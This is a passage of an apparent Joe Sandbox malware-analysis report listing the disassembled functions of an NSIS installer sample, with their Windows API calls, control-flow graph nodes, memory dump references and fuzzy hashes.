                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeGloballstrcpyn
                                                                                                          • String ID: Exch: stack < %d elements$HeadersLobbyDeclineGirlfriend$Pop: stack empty
                                                                                                          • API String ID: 1459762280-2688107579
                                                                                                          • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                                                          • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                                                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                                                                                          Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                                                                          APIs
                                                                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                          • GlobalFree.KERNELBASE(007FCAD8), ref: 00402387
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 3376005127-0
                                                                                                          • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                                                          • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                                                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                                                                                          Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                                                                          APIs
                                                                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                                                                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                                                                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2568930968-0
                                                                                                          • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                                                                          • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                                                                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                                                                                          Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                                                                          APIs
                                                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                          • String ID: <RM>$HeadersLobbyDeclineGirlfriend$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                          • API String ID: 247603264-4101937001
                                                                                                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                                                                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                                                                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                                                                          Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                                                                          APIs
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          Strings
                                                                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                          • API String ID: 3156913733-2180253247
                                                                                                          • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                                                                          • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                                                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                                                                          Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                                                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountFileNameTempTick
                                                                                                          • String ID: nsa
                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                                                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                                                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                                                                          Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                          • String ID: HideWindow
                                                                                                          • API String ID: 1249568736-780306582
                                                                                                          • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                                          • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                                                                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                                          Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                          • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                                                                          • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                                                                          • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                                                                          Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                          • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                                                                          • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                                                                          • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                                                                          Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                          • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                                                                          • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                                                                          • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                                                                          Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                          • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                                                                          • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                                                                          • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                                                                          Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                          • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                                                                          • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                                                                          • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                                                                          Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON
                                                                                                          Download Yara Rule
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                          • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                                                                          • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                                                                          • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                                                                          Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                                                                          • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                                                                          • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1782024602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1781996879.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782043855.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782130425.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1782306613.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_DA92phBHUS.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocFree
                                                                                                          • String ID:
                                                                                                          • API String ID: 3394109436-0
                                                                                                          • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                          • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                                                                          • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                                                                          • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                                                                          Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                          Memory Dump Source
